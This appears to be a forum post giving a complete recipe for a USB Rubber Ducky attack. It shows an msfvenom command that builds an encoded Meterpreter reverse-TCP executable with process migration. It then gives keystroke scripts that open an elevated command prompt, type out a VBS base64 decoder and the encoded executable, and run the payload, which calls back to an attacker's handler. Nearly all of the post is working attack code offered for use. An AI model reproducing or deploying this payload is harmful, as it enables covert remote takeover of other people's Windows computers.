So I have seen people having issues with doing a download of a meterpreter payload and getting it to run from the ducky.
I went for a different approach. I decided to try to modify this script from the wiki (i think darren did a segment on it) in a different way. Here is what I came up with.
Create the exe from msfvenom with the parms to connect the the metasploit handler
Encode the exe with base64
Edit the encoding to be duckyfied
Append the duckyfied encoded exe to met.txt
Append last.txt to met.txt
Duckyencoder to make the inject.bin
Place on ducky sdcard
...
win
msfvenom -a x86 --platform windows \
-p windows/meterpreter/reverse_tcp \
LHOST=IP_ADDRESS \
LPORT=PORT \
PREPENDMIGRATE=true \
PREPENDMIGRATEPROC=notepad.exe \
ReverseConnectRetries=20 \
-b '\x00' \
-e x86/shikata_ga_nai \
-f exe |\
base64 > bad_exe.txt
sed -e 's/^/STRING /' -e '/STRING/ a ENTER' bad_exe.txt >> met.txt
cat last.txt >> met.txt
java -jar encoder.jar -i met.txt -o inject.bin
Contents of met.txt
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 600
LEFTARROW
ENTER
DELAY 400
STRING copy con c:\decoder.vbs
ENTER
STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0)
STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS =
STRING CreateObject("Scripting.FileSystemObject"):
ENTER
STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded =
STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function
STRING decodeBase64(base64):
ENTER
STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):
STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub
STRING writeBytes(file, bytes):Dim binaryStream:
ENTER
STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:
STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub
ENTER
CTRL z
ENTER
STRING copy con c:\bad_exe.txt
ENTER
Contents of last.txt
CTRL z
ENTER
STRING cscript c:\decoder.vbs c:\bad_exe.txt c:\bad.exe
ENTER
STRING c:\bad.exe
ENTER
STRING exit
ENTER